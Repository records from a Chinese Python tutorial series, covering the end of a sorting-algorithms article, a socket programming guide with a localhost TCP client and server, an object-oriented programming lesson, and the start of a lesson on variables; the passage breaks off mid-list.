nums[chilidpos]:\n chilidpos = rightpos\n if nums[chilidpos] > nums[pos]:\n nums[pos], nums[chilidpos] = nums[chilidpos], nums[pos]\n adjust_heap(nums, pos, endpos)\n\n n = len(nums)\n # 建堆\n for i in reversed(range(n // 2)):\n adjust_heap(nums, i, n)\n # 调整堆\n for i in range(n - 1, -1, -1):\n nums[0], nums[i] = nums[i], nums[0]\n adjust_heap(nums, 0, i)\n return nums\n\n```\n\n## 8.计数排序(Counting Sort)\n\n **计数排序** 的核心在于将输入的数据值转化为键存储在额外开辟的数组空间中。 作为一种线性时间复杂度的排序,计数排序要求输入的数据必须是有确定范围的整数。\n\n\n\n```python\ndef counting_sort(nums):\n if not nums: return []\n n = len(nums)\n _min = min(nums)\n _max = max(nums)\n tmp_arr = [0] * (_max - _min + 1)\n for num in nums:\n tmp_arr[num - _min] += 1\n j = 0\n for i in range(n):\n while tmp_arr[j] == 0:\n j += 1\n nums[i] = j + _min\n tmp_arr[j] -= 1\n return nums\n\n```\n\n## 9.桶排序(Bucket Sort)\n\n桶排序是计数排序的升级版,原理是:输入数据服从均匀分布的,将数据分到有限数量的桶里,每个桶再分别排序(有可能再使用别的算法或是以递归方式继续使用桶排序,此文编码采用递归方式)\n\n算法描述:\n\n人为设置一个桶的BucketSize,作为每个桶放置多少个不同数值(意思就是BucketSize = 5,可以放5个不同数字比如[1, 2, 3,4,5]也可以放 100000个3,只是表示该桶能存几个不同的数值)\n遍历待排序数据,并且把数据一个一个放到对应的桶里去\n对每个不是桶进行排序,可以使用其他排序方法,也递归排序\n不是空的桶里数据拼接起来\n\n```python\ndef bucket_sort(nums, bucketSize):\n if len(nums) < 2:\n return nums\n _min = min(nums)\n _max = max(nums)\n # 需要桶个数\n bucketNum = (_max - _min) // bucketSize + 1\n buckets = [[] for _ in range(bucketNum)]\n for num in nums:\n # 放入相应的桶中\n buckets[(num - _min) // bucketSize].append(num)\n res = []\n\n for bucket in buckets:\n if not bucket: continue\n if bucketSize == 1:\n res.extend(bucket)\n else:\n # 当都装在一个桶里,说明桶容量大了\n if bucketNum == 1:\n bucketSize -= 1\n res.extend(bucket_sort(bucket, bucketSize))\n return res\n\n```\n\n## 10.基数排序(Radix Sort)\n\n **基数排序**也是非比较的排序算法,对每一位进行排序,从最低位开始排序,复杂度为O(kn),为数组长度,k为数组中的数的最大的位数;\n\n **基数排序**是按照低位先排序,然后收集;再按照高位排序,然后再收集;依次类推,直到最高位。有时候有些属性是有优先级顺序的,先按低优先级排序,再按高优先级排序。最后的次序就是高优先级高的在前,高优先级相同的低优先级高的在前。基数排序基于分别排序,分别收集,所以是稳定的。\n\n\n\n```python\ndef Radix_sort(nums):\n if not nums: return []\n _max = max(nums)\n # 最大位数\n maxDigit = len(str(_max))\n bucketList = [[] for _ in range(10)]\n # 从低位开始排序\n div, mod = 1, 10\n for i in range(maxDigit):\n for num in nums:\n bucketList[num % mod // div].append(num)\n div *= 10\n mod *= 10\n idx = 0\n for j in range(10):\n for item in bucketList[j]:\n nums[idx] = item\n idx += 1\n bucketList[j] = []\n return nums\n\n```\n\n参考文章:https://blog.csdn.net/MobiusStrip/article/details/83785159?depth_1-utm_source=distribute.pc_relevant.none-task&utm_source=distribute.pc_relevant.none-task\n\n"
},
{
"alpha_fraction": 0.5069538950920105,
"alphanum_fraction": 0.5208616256713867,
"avg_line_length": 42.35293960571289,
"blob_id": "292da7682598d40f839bae067818b54ba0c99064",
"content_id": "e91b35c8dd5dde0664e921a8cf136791e4b7ab17",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 9038,
"license_type": "permissive",
"max_line_length": 216,
"num_lines": 136,
"path": "/Python基础连载/Python网络通信.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "# Python连载系列:Python网络通信\n\n## Python网络通信-socket编程\n\n- Python网络编程 - 套接字的概念 / socket模块 / socket函数 / 创建TCP服务器 / 创建TCP客户端 / 创建UDP服务器 / 创建UDP客户端 / SocketServer模块\n\n### 套接字\n\n套接字这个词对很多不了解网络编程的人来说显得非常晦涩和陌生,其实说得通俗点,套接字就是一套用[C语言](https://zh.wikipedia.org/wiki/C语言)写成的应用程序开发库,主要用于实现进程间通信和网络编程,在网络应用开发中被广泛使用。在Python中也可以基于套接字来使用传输层提供的传输服务,并基于此开发自己的网络应用。实际开发中使用的套接字可以分为三类:流套接字(TCP套接字)、数据报套接字和原始套接字。\n\nPython的Socket逻辑如下:\n\n\n\n这张逻辑图,是整个socket编程中的重点的重点,你必须将它理解、吃透,然后刻在脑海里,真正成为自己记忆的一部分!很多人说怎么都学不会socket编程,归根到底的原因就是没有“死记硬背”知识点。\n\n在Python中,`import socket`后,用`socket.socket()`方法来创建套接字,语法格式如下:\n\n```\nsk = socket.socket([family[, type[, proto]]])\n```\n\n参数说明:\n\n- family: 套接字家族,可以使`AF_UNIX`或者`AF_INET`。\n- type: 套接字类型,根据是面向连接的还是非连接分为`SOCK_STREAM`或`SOCK_DGRAM`,也就是TCP和UDP的区别。\n- protocol: 一般不填默认为0。\n\n直接socket.socket(),则全部使用默认值。\n\n下面是具体的参数定义:\n\n| socket类型 | 描述 |\n| --------------------- | ------------------------------------------------------------ |\n| socket.AF_UNIX | 只能够用于单一的Unix系统进程间通信 |\n| socket.AF_INET | IPv4 |\n| socket.AF_INET6 | IPv6 |\n| socket.SOCK_STREAM | 流式socket , for TCP |\n| socket.SOCK_DGRAM | 数据报式socket , for UDP |\n| socket.SOCK_RAW | 原始套接字,普通的套接字无法处理ICMP、IGMP等网络报文,而SOCK_RAW可以;其次,SOCK_RAW也可以处理特殊的IPv4报文;此外,利用原始套接字,可以通过IP_HDRINCL套接字选项由用户构造IP头。 |\n| socket.SOCK_SEQPACKET | 可靠的连续数据包服务 |\n| 创建TCP Socket: | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) |\n| 创建UDP Socket: | s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) |\n\n通过`s = socket.socket()`方法,我们可以获得一个socket对象s,也就是通常说的获取了一个“套接字”,该对象具有一下方法:\n\n| 方法 | 描述 |\n| ------------------------------------ | ------------------------------------------------------------ |\n| **服务器端方法** | |\n| **s.bind()** | 绑定地址(host,port)到套接字,在AF_INET下,以元组(host,port)的形式表示地址。 |\n| **s.listen(backlog)** | 开始监听。backlog指定在拒绝连接之前,操作系统可以挂起的最大连接数量。该值至少为1,大部分应用程序设为5就可以了。 |\n| **s.accept()** | 被动接受客户端连接,(阻塞式)等待连接的到来,并返回(conn,address)二元元组,其中conn是一个通信对象,可以用来接收和发送数据。address是连接客户端的地址。 |\n| **客户端方法** | |\n| **s.connect(address)** | 客户端向服务端发起连接。一般address的格式为元组(hostname,port),如果连接出错,返回socket.error错误。 |\n| s.connect_ex() | connect()函数的扩展版本,出错时返回出错码,而不是抛出异常 |\n| **公共方法** | |\n| **s.recv(bufsize)** | 接收数据,数据以bytes类型返回,bufsize指定要接收的最大数据量。 |\n| **s.send()** | 发送数据。返回值是要发送的字节数量。 |\n| **s.sendall()** | 完整发送数据。将数据发送到连接的套接字,但在返回之前会尝试发送所有数据。成功返回None,失败则抛出异常。 |\n| s.recvform() | 接收UDP数据,与recv()类似,但返回值是(data,address)。其中data是包含接收的数据,address是发送数据的套接字地址。 |\n| s.sendto(data,address) | 发送UDP数据,将数据data发送到套接字,address是形式为(ipaddr,port)的元组,指定远程地址。返回值是发送的字节数。 |\n| **s.close()** | 关闭套接字,必须执行。 |\n| s.getpeername() | 返回连接套接字的远程地址。返回值通常是元组(ipaddr,port)。 |\n| s.getsockname() | 返回套接字自己的地址。通常是一个元组(ipaddr,port) |\n| s.setsockopt(level,optname,value) | 设置给定套接字选项的值。 |\n| s.getsockopt(level,optname[.buflen]) | 返回套接字选项的值。 |\n| s.settimeout(timeout) | 设置套接字操作的超时期,timeout是一个浮点数,单位是秒。值为None表示没有超时期。一般,超时期应该在刚创建套接字时设置,因为它们可能用于连接的操作(如connect()) |\n| s.gettimeout() | 返回当前超时期的值,单位是秒,如果没有设置超时期,则返回None。 |\n| s.fileno() | 返回套接字的文件描述符。 |\n| s.setblocking(flag) | 如果flag为0,则将套接字设为非阻塞模式,否则将套接字设为阻塞模式(默认值)。非阻塞模式下,如果调用recv()没有发现任何数据,或send()调用无法立即发送数据,那么将引起socket.error异常。 |\n| s.makefile() | 创建一个与该套接字相关连的文件 |\n\n**注意事项:**\n\n1. Python3以后,socket传递的都是**bytes类型**的数据,字符串需要先转换一下,`string.encode()`即可;另一端接收到的bytes数据想转换成字符串,只要`bytes.decode()`一下就可以。\n2. 在正常通信时,`accept()`和`recv()`方法都是阻塞的。所谓的阻塞,指的是程序会暂停在那,一直等到有数据过来。\n\n下面我们来通过代码来详细的理解一下:\n\n下面是TCP套接字编程:\n\n服务端:\n\n```python\n#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport socket\n\nip_port = ('127.0.0.1', 8888)\n\nsk = socket.socket() # 创建套接字\nsk.bind(ip_port) # 绑定服务地址\nsk.listen(5) # 监听连接请求\nprint('启动socket服务,等待客户端连接...')\nconn, address = sk.accept() # 等待连接,此处自动阻塞\nwhile True: # 一个死循环,直到客户端发送‘exit’的信号,才关闭连接\n client_data = conn.recv(1024).decode() # 接收信息\n if client_data == \"exit\": # 判断是否退出连接\n exit(\"通信结束\")\n print(\"来自%s的客户端向你发来信息:%s\" % (address, client_data))\n conn.sendall('服务器已经收到你的信息'.encode()) # 回馈信息给客户端\nconn.close() # 关闭连接\n```\n\n客户端\n\n```\n#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport socket\n\nip_port = ('127.0.0.1', 9999)\n\ns = socket.socket() # 创建套接字\n\ns.connect(ip_port) # 连接服务器\n\nwhile True: # 通过一个死循环不断接收用户输入,并发送给服务器\n inp = input(\"请输入要发送的信息: \").strip()\n if not inp: # 防止输入空信息,导致异常退出\n continue\n s.sendall(inp.encode())\n\n if inp == \"exit\": # 如果输入的是‘exit’,表示断开连接\n print(\"结束通信!\")\n break\n\n server_reply = s.recv(1024).decode()\n print(server_reply)\n\ns.close() # 关闭连接\n```\n\n\n"
},
{
"alpha_fraction": 0.5586930513381958,
"alphanum_fraction": 0.6058638691902161,
"avg_line_length": 19.449115753173828,
"blob_id": "aacbac88603be40fa96153960bc77569fa05dc58",
"content_id": "593c48f599706765a10d730661ef2f236db703e1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 16027,
"license_type": "permissive",
"max_line_length": 181,
"num_lines": 452,
"path": "/Python基础连载/面向对象基础.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "# Python连载系列:面向对象基础\n\n## 面向对象基础\n\n- 类和对象 - 什么是类 / 什么是对象 / 面向对象其他相关概念\n- 定义类 - 基本结构 / 属性和方法 / 构造器 / 析构器 / __str__方法\n- 创建对象 \n- 面向对象的三大特征 封装 / 继承 / 多态\n\n**这是很多编程语言的一个基础知识,那什么才是面向对象呢?**\n\n要理解面向对象,我们先来看看与面向对象相对应的另外一种程序设计方法:面向过程。\n\n面向过程的编程的基本构成便是“过程”,过程实现的方式就是“函数”,我们通过不同函数来实现不同的功能,并按照程序的执行顺序调用相应的函数,组成一个完整的可以运行的应用程序。我们可以通过把不同的功能在不同的函数中实现或者给函数传递不同的参数来实现不同的功能,这是面向过程中模块化设计的原理。\n\n但是面向过程有很多问题,当我们总是按照教科书上的小例子来学习程序设计时是永远也体会不到面向过程中存在的这些问题的,反而会觉得面向过程更简单,更容易理解。而事实是当我们设计一些大型的应用的时候你将会发现使用面向过程编程是多么的痛苦和无奈,代码极难维护,我们不得不为相似功能设计不同的函数,天长日久,代码量越来越大,函数越来越多,而重复的代码越来越多,噩梦就此产生。\n\n于是乎产生了另外一种设计思想:面向对象,从此程序员发现编程是多么快乐的一件事情。我们可以把现实世界的很多哲学思想或者模型应用于编程,这是计算机的一次伟大的革命。那么究竟何为面向对象?要理解这两个重要的字“对象“,我们首先需要理解一下类和实例:\n\n举一个简单的例子,大家都会下五子棋,我们就以开发一个五子棋的游戏来讲解面向过程和面向对象最本质的区别,在早期以面向过程为主要开发方法时,我们是这样来设计这个游戏的:\n\n1. 开始游戏;\n2. 黑方出子;\n3. 绘制画面;\n4. 判断胜负;\n5. 白方出子;\n6. 绘制画面;\n7. 判断胜负;\n8. 循环2、3、4、5、6、7步;\n9. 输出结果。\n\n最后将每一个步骤作为一个处理函数开发出来,每次运行都调用一遍函数(或者过程)。面向过程最关键的概念就是“过程”,所以程序运行都是一步接一步,从上往下。\n\n而面向对象的设计则是从另外的思路来解决问题。整个五子棋可以分为:\n\n1. 黑白双方:负责出子和悔棋;\n2. 棋盘系统:负责绘制画面;\n3. 规则系统:负责判定诸如犯规、输赢等;\n4. 输入输出系统:负责接收黑白子放的位置信息和输出游戏过程中的相关信息。\n\n这就是面向对象,更强调将程序模块化,我们甚至可以将该程序抽象出来使其适用于五子棋和围棋(它们除了规则不一样以外没有其它区别,那么我们只需要修改规则系统便可轻易支持围棋)。\n\n**再初步理解了什么是面向对象的时候,我们接下来就要去理解一下什么是类,什么是对象**\n\n---\n\n**类** 和 **对象** 是 **面向对象编程的 两个 核心概念**\n\n### 类\n\n+ **类** 是对一群具有 **相同 特征** 或者 **行为** 的事物的一个统称,是抽象的,**不能直接使用**\n + **特征** 被称为 **属性**\n + **行为** 被称为 **方法**\n+ **类** 就相当于制造飞机时的**图纸**,是一个 **模板**,是 **负责创建对象的**\n\n\n\n### 对象\n\n+ **对象** 是 **由类创建出来的一个具体存在**,可以直接使用\n+ 由 **哪一个类** 创建出来的 **对象**,就拥有在 **哪一个类** 中定义的:\n + 属性\n + 方法\n+ **对象** 就相当于用 **图纸** **制造** 的飞机\n\n**在程序开发中,应该先有类,再有对象**\n\n## 类和对象的关系\n\n+ **类是模板**,**对象** 是根据 **类** 这个模板创建出来的,应该 **先有类,再有对象**\n+ **类** 只有一个,而 **对象** 可以有很多个\n + **不同的对象** 之间 **属性** 可能会各不相同\n+ **类** 中定义了什么 **属性和方法**,**对象** 中就有什么属性和方法,**不可能多,也不可能少**\n\n### 定义类\n\n在Python中可以使用`class`关键字定义类,然后在类中通过之前学习过的函数来定义方法,这样就可以将对象的动态特征描述出来,代码如下所示。\n\n```Python\nclass Student(object):\n\n # __init__是一个特殊方法用于在创建对象时进行初始化操作\n # 通过这个方法我们可以为学生对象绑定name和age两个属性\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def study(self, course_name):\n print('%s正在学习%s.' % (self.name, course_name))\n\n \n # 驼峰命名法(驼峰标识)\n def watch_movie(self):\n if self.age < 18:\n print('%s正在看蜡笔小新.' % self.name)\n else:\n print('%s正在观看海贼王' % self.name)\n```\n\n### 创建和使用对象\n\n当我们定义好一个类之后,可以通过下面的方式来创建对象并给对象发消息。\n\n```\ndef main():\n # 创建学生对象并指定姓名和年龄\n stu1 = Student('海森堡', 19)\n # 给对象发study消息\n stu1.study('大话Python')\n # 给对象发watch_av消息\n stu1.watch_movie()\n \n\n\nif __name__ == '__main__':\n main()\n```\n\n## 类的设计\n\n在使用面相对象开发前,应该首先分析需求,确定一下,程序中需要包含哪些类!\n\n\n\n在程序开发中,要设计一个类,通常需要满足一下三个要素:\n\n1. **类名** 这类事物的名字,**满足大驼峰命名法**\n2. **属性** 这类事物具有什么样的特征\n3. **方法** 这类事物具有什么样的行为\n\n### 大驼峰命名法\n\n```\nCapWords\n```\n\n1. 每一个单词的首字母大写\n2. 单词与单词之间没有下划线\n\n### 面向对象的三大特征\n\n面向想有三大特征: 封装,继承,多态,下面我们来了解一下这三大特性。\n\n**什么是封装呢?**\n\n我个人的理解就是,把你的属性隐藏起来,外界不可获取到。我简单的分为四点去理解:\n\n1. **封装** 是面向对象编程的一大特点\n2. 面向对象编程的 **第一步** —— 将 **属性** 和 **方法** **封装** 到一个抽象的 **类** 中\n3. **外界** 使用 **类** 创建 **对象**,然后 **让对象调用方法**\n4. **对象方法的细节** 都被 **封装** 在 **类的内部**\n\n我们通过一个例子来了解一下什么是封装:\n\n**需求**\n\n1. **小明** **体重** `75.0` 公斤\n2. 小明每次 **跑步** 会减肥 `0.5` 公斤\n3. 小明每次 **吃东西** 体重增加 `1` 公斤\n\n\n\n> 提示:在 **对象的方法内部**,是可以 **直接访问对象的属性** 的!\n\n+ 代码实现\n\n```\nclass Person:\n \"\"\"人类\"\"\"\n“”“封装”“”\n def __init__(self, name, weight):\n\n self.name = name\n self.weight = weight\n\n\"\"\"内置的方法,下一节会讲到\"\"\"\n def __str__(self):\n\n return \"我的名字叫 %s 体重 %.2f 公斤\" % (self.name, self.weight)\n\n def run(self):\n \"\"\"跑步\"\"\"\n\n print(\"%s 爱跑步,跑步锻炼身体\" % self.name)\n self.weight -= 0.5\n\n def eat(self):\n \"\"\"吃东西\"\"\"\n\n print(\"%s 是吃货,吃完这顿再减肥\" % self.name)\n self.weight += 1\n\n\nxiaoming = Person(\"小明\", 75)\n\nxiaoming.run()\nxiaoming.eat()\nxiaoming.eat()\n\nprint(xiaoming)\n```\n\n#### 定义一个类描述数字时钟。\n\n```Python\nfrom time import sleep\n\n\nclass Clock(object):\n \"\"\"数字时钟\"\"\"\n\n def __init__(self, hour=0, minute=0, second=0):\n \"\"\"初始化方法\n\n :param hour: 时\n :param minute: 分\n :param second: 秒\n \"\"\"\n self._hour = hour\n self._minute = minute\n self._second = second\n\n def run(self):\n \"\"\"走字\"\"\"\n self._second += 1\n if self._second == 60:\n self._second = 0\n self._minute += 1\n if self._minute == 60:\n self._minute = 0\n self._hour += 1\n if self._hour == 24:\n self._hour = 0\n\n def show(self):\n \"\"\"显示时间\"\"\"\n return '%02d:%02d:%02d' % \\\n (self._hour, self._minute, self._second)\n\n\ndef main():\n clock = Clock(23, 59, 58)\n while True:\n print(clock.show())\n sleep(1)\n clock.run()\n\n\nif __name__ == '__main__':\n main()\n```\n\n### 继承\n\n继承,从字面意识上理解,就是可以实现从父亲辈继承到一些遗产什么的,而在Python中就是可以继承到一些属性和方法。Python与Java在继承中有一个非常大的区别就是Python支持多继承,而java只支持单继承。\n\n## 单继承\n\n### 继承的概念、语法和特点\n\n**继承的概念**:**子类** 拥有 **父类** 的所有 **方法** 和 **属性**\n\n\n\n#### 1) 继承的语法\n\n```\nclass 类名(父类名):\n\n pass\n```\n\n+ `Dog` 类是 `Animal` 类的**子类**,`Animal` 类是 `Dog` 类的**父类**,`Dog` 类从 `Animal` 类**继承**\n+ `Dog` 类是 `Animal` 类的**派生类**,`Animal` 类是 `Dog` 类的**基类**,`Dog` 类从 `Animal` 类**派生**\n\n#### 2) 专业术语\n\n+ `C` 类从 `B` 类继承,`B` 类又从 `A` 类继承\n+ 那么 `C` 类就具有 `B` 类和 `A` 类的所有属性和方法\n\n### 方法的重写\n\n+ **子类** 拥有 **父类** 的所有 **方法** 和 **属性**\n+ **子类** 继承自 **父类**,可以直接 **享受** 父类中已经封装好的方法,不需要再次开发\n\n**应用场景**\n\n+ 当 **父类** 的方法实现不能满足子类需求时,可以对方法进行 **重写(override)**\n\n\n\n**重写** 父类方法有两种情况:\n\n1. **覆盖** 父类的方法\n2. 对父类方法进行 **扩展**\n\n#### 1) 覆盖父类的方法\n\n+ 如果在开发中,**父类的方法实现** 和 **子类的方法实现**,**完全不同**\n+ 就可以使用 **覆盖** 的方式,**在子类中** **重新编写** 父类的方法实现\n\n> 具体的实现方式,就相当于在 **子类中** 定义了一个 **和父类同名的方法并且实现**\n\n#### 2) 对父类方法进行 **扩展**\n\n+ 如果在开发中,**子类的方法实现** 中 **包含** **父类的方法实现**\n + **父类原本封装的方法实现** 是 **子类方法的一部分**\n+ 就可以使用 **扩展** 的方式\n + **在子类中** **重写** 父类的方法\n + 在需要的位置使用 `super().父类方法` 来调用父类方法的执行\n + 代码其他的位置针对子类的需求,编写 **子类特有的代码实现**\n\n##### 关于 `super`\n\n+ 在 `Python` 中 `super` 是一个 **特殊的类**\n+ `super()` 就是使用 `super` 类创建出来的对象\n+ **最常** 使用的场景就是在 **重写父类方法时**,调用 **在父类中封装的方法实现**\n\n### 父类的 私有属性 和 私有方法\n\n1. **子类对象** **不能** 在自己的方法内部,**直接** 访问 父类的 **私有属性** 或 **私有方法**\n2. **子类对象** 可以通过 **父类** 的 **公有方法** **间接** 访问到 **私有属性** 或 **私有方法**\n\n> - **私有属性、方法** 是对象的隐私,不对外公开,**外界** 以及 **子类** 都不能直接访问\n> - **私有属性、方法** 通常用于做一些内部的事情\n\n\n\n- `B` 的对象不能直接访问 `__num2` 属性\n- `B` 的对象不能在 `demo` 方法内访问 `__num2` 属性\n- `B` 的对象可以在 `demo` 方法内,调用父类的 `test` 方法\n- 父类的 `test` 方法内部,能够访问 `__num2` 属性和 `__test` 方法\n\n## 多继承\n\n**概念**\n\n+ **子类** 可以拥有 **多个父类**,并且具有 **所有父类** 的 **属性** 和 **方法**\n+ 例如:**孩子** 会继承自己 **父亲** 和 **母亲** 的 **特性**\n\n\n\n\n\n**语法**\n\n```\nclass 子类名(父类名1, 父类名2...)\n pass\n```\n\n#### Python 中的 MRO —— 方法搜索顺序(了解)\n\n- `Python` 中针对 **类** 提供了一个 **内置属性** `__mro__` 可以查看 **方法** 搜索顺序\n- MRO 是 `method resolution order`,主要用于 **在多继承时判断 方法、属性 的调用 路径**\n\n```\nprint(C.__mro__)\n```\n\n**输出结果**\n\n```\n(<class '__main__.C'>, <class '__main__.A'>, <class '__main__.B'>, <class 'object'>)\n```\n\n- 在搜索方法时,是按照 `__mro__` 的输出结果 **从左至右** 的顺序查找的\n- 如果在当前类中 **找到方法,就直接执行,不再搜索**\n- 如果 **没有找到,就查找下一个类** 中是否有对应的方法,**如果找到,就直接执行,不再搜索**\n- 如果找到最后一个类,还没有找到方法,程序报错\n\n## 多态\n\n重温一下面向对象三大特性:\n\n1. **封装** 根据 **职责** 将 **属性** 和 **方法** **封装** 到一个抽象的 **类** 中\n - 定义类的准则\n2. **继承** **实现代码的重用**,相同的代码不需要重复的编写\n - 设计类的技巧\n - 子类针对自己特有的需求,编写特定的代码\n3. **多态** 不同的 **子类对象** 调用相同的 **父类方法**,产生不同的执行结果\n - **多态** 可以 **增加代码的灵活度**\n - 以 **继承** 和 **重写父类方法** 为前提\n - 是调用方法的技巧,**不会影响到类的内部设计**\n\n\n\n## 多态案例演练\n\n1.在 `Dog` 类中封装方法 `game`\n\n- 普通狗只是简单的玩耍\n\n2.定义 `XiaoTianDog` 继承自 `Dog`,并且重写 `game` 方法\n\n- 哮天犬需要在天上玩耍\n\n3.定义 `Person` 类,并且封装一个 **和狗玩** 的方法\n\n+ 在方法内部,直接让 **狗对象** 调用 `game` 方法\n\n\n\n**案例小结**\n\n- `Person` 类中只需要让 **狗对象** 调用 `game` 方法,而不关心具体是 **什么狗**\n - `game` 方法是在 `Dog` 父类中定义的\n- 在程序执行时,传入不同的 **狗对象** 实参,就会产生不同的执行效果\n\n> **多态** 更容易编写出出通用的代码,做出通用的编程,以适应需求的不断变化!\n\n```\nclass Dog(object):\n\n def __init__(self, name):\n self.name = name\n\n def game(self):\n print(\"%s 蹦蹦跳跳的玩耍...\" % self.name)\n\n\nclass XiaoTianDog(Dog):\n\n def game(self):\n print(\"%s 飞到天上去玩耍...\" % self.name)\n\n\nclass Person(object):\n\n def __init__(self, name):\n self.name = name\n\n def game_with_dog(self, dog):\n\n print(\"%s 和 %s 快乐的玩耍...\" % (self.name, dog.name))\n\n # 让狗玩耍\n dog.game()\n\n\n# 1. 创建一个狗对象\n# wangcai = Dog(\"旺财\")\nwangcai = XiaoTianDog(\"飞天旺财\")\n\n# 2. 创建一个小明对象\nxiaoming = Person(\"小明\")\n\n# 3. 让小明调用和狗玩的方法\nxiaoming.game_with_dog(wangcai)\n```\n\n\n"
},
{
"alpha_fraction": 0.4980723559856415,
"alphanum_fraction": 0.5270611047744751,
"avg_line_length": 19.31174659729004,
"blob_id": "e9d4f87a89b9f3b3f7a4f62295815cb52fc649d4",
"content_id": "6f06c8786b015c011903bd85f57b114fd5257553",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 23608,
"license_type": "permissive",
"max_line_length": 876,
"num_lines": 664,
"path": "/Python基础连载/Python语言相关.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "# Python连载系列:Python语言相关\n\n# Python语言相关\n\n- 程序和进制\n- 变量 - 变量的命名 / 变量的使用 / input函数 / 检查变量类型 / 类型转换\n- 数字和字符串 - 整数 / 浮点数 / 复数 / 字符串 / 字符串基本操作 / 字符编码\n- 运算符 - 数学运算符 / 赋值运算符 / 比较运算符 / 逻辑运算符 / 身份运算符 / 运算符的优先级\n\n### 程序和进制\n\n计算机的硬件系统通常由五大部件构成,包括:运算器、控制器、存储器、输入设备和输出设备。其中,运算器和控制器放在一起就是我们通常所说的中央处理器,它的功能是执行各种运算和控制指令以及处理计算机软件中的数据。我们通常所说的程序实际上就是指令的集合,我们程序就是将一系列的指令按照某种方式组织到一起,然后通过这些指令去控制计算机做我们想让它做的事情。今天我们大多数时候使用的计算机,虽然它们的元器件做工越来越精密,处理能力越来越强大,但究其本质来说仍然属于[“冯·诺依曼结构”](https://zh.wikipedia.org/wiki/冯·诺伊曼结构)的计算机。“冯·诺依曼结构”有两个关键点,一是指出要将存储设备与中央处理器分开,二是提出了将数据以二进制方式编码。二进制是一种“逢二进一”的计数法,跟我们人类使用的“逢十进一”的计数法没有实质性的区别,人类因为有十根手指所以使用了十进制(因为在数数时十根手指用完之后就只能进位了,当然凡事都有例外,玛雅人可能是因为长年光着脚的原因把脚趾头也算上了,于是他们使用了二十进制的计数法,在这种计数法的指导下玛雅人的历法就与我们平常使用的历法不一样,而按照玛雅人的历法,2012年是上一个所谓的“太阳纪”的最后一年,而2013年则是新的“太阳纪”的开始,后来这件事情被以讹传讹的方式误传为”2012年是玛雅人预言的世界末日“这种荒诞的说法,今天我们可以大胆的猜测,玛雅文明之所以发展缓慢估计也与使用了二十进制有关)。对于计算机来说,二进制在物理器件上来说是最容易实现的(高电压表示1,低电压表示0),于是在“冯·诺依曼结构”的计算机都使用了二进制。虽然我们并不需要每个程序员都能够使用二进制的思维方式来工作,但是了解二进制以及它与我们生活中的十进制之间的转换关系,以及二进制与八进制和十六进制的转换关系还是有必要的。如果你对这一点不熟悉,可以自行使用[维基百科](https://zh.wikipedia.org/wiki/二进制)或者[百度百科](https://baike.baidu.com/)科普一下。\n\n### 变量与类型\n\n在程序设计中,变量是一种存储数据的载体。计算机中的变量是实际存在的数据或者说是存储器中存储数据的一块内存空间,变量的值可以被读取和修改,这是所有计算和控制的基础。计算机能处理的数据有很多种类型,除了数值之外还可以处理文本、图形、音频、视频等各种各样的数据,那么不同的数据就需要定义不同的存储类型。\n\n> **程序就是用来处理数据的,而变量就是用来存储数据的**\n\n## 变量定义\n\n- 在 Python 中,每个变量 **在使用前都必须赋值**,变量 **赋值以后** 该变量 **才会被创建**\n- 等号(=)用来给变量赋值\n - `=` 左边是一个变量名\n - `=` 右边是存储在变量中的值\n\n```\n变量名 = 值\n```\n\n> 变量定义之后,后续就可以直接使用了\n\n### 1) 变量演练1-- IDLE —— Python\n\n```\n# 定义 qq_number 的变量用来保存 qq 号码\nIn [1]: qq_number = \"1234567\"\n\n# 输出 qq_number 中保存的内容\nIn [2]: qq_number\nOut[2]: '1234567'\n\n# 定义 qq_password 的变量用来保存 qq 密码\nIn [3]: qq_password = \"123\"\n\n# 输出 qq_password 中保存的内容\nIn [4]: qq_password\nOut[4]: '123'\n```\n\n> 使用交互式方式,如果要查看变量内容,直接输入变量名即可,不需要使用 `print` 函数\n\n### 2) 变量演练 2 —— PyCharm\n\n```\n# 定义 qq 号码变量\nqq_number = \"1234567\"\n\n# 定义 qq 密码变量\nqq_password = \"123\"\n\n# 在程序中,如果要输出变量的内容,需要使用 print 函数\nprint(qq_number)\nprint(qq_password)\n```\n\n> 使用解释器执行,如果要输出变量的内容,必须要要使用 `print` 函数\n\n### 3) 变量演练 3 —— 超市买苹果\n\n> - 可以用 **其他变量的计算结果** 来定义变量\n> - 变量定义之后,后续就可以直接使用了\n\n**需求**\n\n- 苹果的价格是 **8.5 元/斤**\n- 买了 **7.5 斤** 苹果\n- 计算付款金额\n\n```\n# 定义苹果价格变量\nprice = 8.5\n\n# 定义购买重量\nweight = 7.5\n\n# 计算金额\nmoney = price * weight\n\nprint(money)\n```\n\n#### 思考题\n\n- 如果 **只要买苹果,就返 5 块钱**\n- 请重新计算购买金额\n\n```\n# 定义苹果价格变量\nprice = 8.5\n\n# 定义购买重量\nweight = 7.5\n\n# 计算金额\nmoney = price * weight\n\n# 只要买苹果就返 5 元\nmoney = money - 5\nprint(money)\n```\n\n**提问**\n\n- 上述代码中,一共定义有几个变量?\n\n - 三个:`price`/`weight`/`money`\n\n- ```\n money = money - 5\n ```\n\n \n\n 是在定义新的变量还是在使用变量?\n\n - 直接使用之前已经定义的变量\n - 变量名 只有在 **第一次出现** 才是 **定义变量**\n - 变量名 再次出现,不是定义变量,而是直接使用之前定义过的变量\n\n- 在程序开发中,可以修改之前定义变量中保存的值吗?\n\n - 可以\n - 变量中存储的值,就是可以 **变** 的\n\n## 02. 变量的类型\n\n- 在内存中创建一个变量,会包括:\n 1. 变量的名称\n 2. 变量保存的数据\n 3. 变量存储数据的类型\n 4. 变量的地址(标示)\n\n### 2.1 变量类型的演练 —— 个人信息\n\n**需求**\n\n- 定义变量保存小明的个人信息\n- 姓名:**小明**\n- 年龄:**18** 岁\n- 